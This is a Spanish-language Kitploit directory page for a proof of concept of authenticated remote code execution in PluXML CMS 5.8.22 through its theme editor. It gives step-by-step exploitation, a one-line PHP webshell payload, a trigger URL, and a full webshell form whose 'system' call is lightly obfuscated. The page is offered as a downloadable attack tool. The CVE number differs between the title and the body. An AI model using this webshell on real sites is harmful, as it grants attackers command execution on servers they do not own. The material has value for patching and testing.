Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-67435 — Se ha identificado una vulnerabilidad crítica de ejecución remota de código (RCE) en PluXML CMS versión 5.8.22. Esta vulnerabilidad permite a administradores autenticados ejecutar código PHP arbitrario en el servidor web mediante la subida de webshells PHP maliciosas a través de la funcionalidad del editor de temas. | Kitploit
Herramientas/GitHubGitHub/rajchowdhury240/cve-2025-67435
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubrajchowdhury240/cve-2025-67435

CVE-2025-67435

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

1hace 7 mesesAún no revisado

Se ha identificado una vulnerabilidad crítica de ejecución remota de código (RCE) en PluXML CMS versión 5.8.22. Esta vulnerabilidad permite a administradores autenticados ejecutar código PHP arbitrario en el servidor web mediante la subida de webshells PHP maliciosas a través de la funcionalidad del editor de temas.

Compartir

CVE-2025-67436

Ejecución remota de código (RCE) autenticada en PluXml CMS 5.8.22

Investigador : Chowdhury Faizal Ahammed

Instalación

root@kitploit:~
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
imagen imagen imagen imagen imagen

Prueba de concepto

Explotación paso a paso

Autenticación: inicie sesión en el panel de administración de PluXML con credenciales de administrador válidas Navegue al editor de temas:

Acceda al panel de administración Navegue a: Temas → Home.php → Editar imagen

Inyecte el payload malicioso:

  • Reemplace el contenido existente en home.php con una webshell en PHP

  • Ejemplo de payload: <?php system($_GET['cmd']); ?>

  • Guarde el archivo modificado

Desencadene la ejecución:

Visite la página de inicio principal del sitio web El código PHP inyectado se ejecuta con los privilegios del servidor web

  • Se pueden ejecutar comandos remotos a través de: http://target.com/?cmd=whoami

Reverse Shell

imagen

Payload de la webshell

root@kitploit:~
<html>
  <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
      <input
        type="TEXT"
        name="cmd"
        autofocus
        id="cmd"
        size="80"
      >
      <input
        type="SUBMIT"
        value="Execute"
      >
    </form>

    <pre>
<?php
if (isset($_GET['cmd'])) {
    $func_name = "sys" . "tem";
    $func_name($_GET['cmd']);
}
?>
    </pre>
  </body>
</html>
imagen imagen

Referencias

  • CVE-2025-67436: https://nvd.nist.gov/vuln/detail/CVE-2025-67436
  • Sitio web oficial de PluXML: https://www.pluxml.org/
  • Repositorio de PluXML en GitHub: https://github.com/pluxml/PluXml
  • OWASP Top 10 - A03:2021 Inyección: https://owasp.org/Top10/A03_2021-Injection/
Descargar herramienta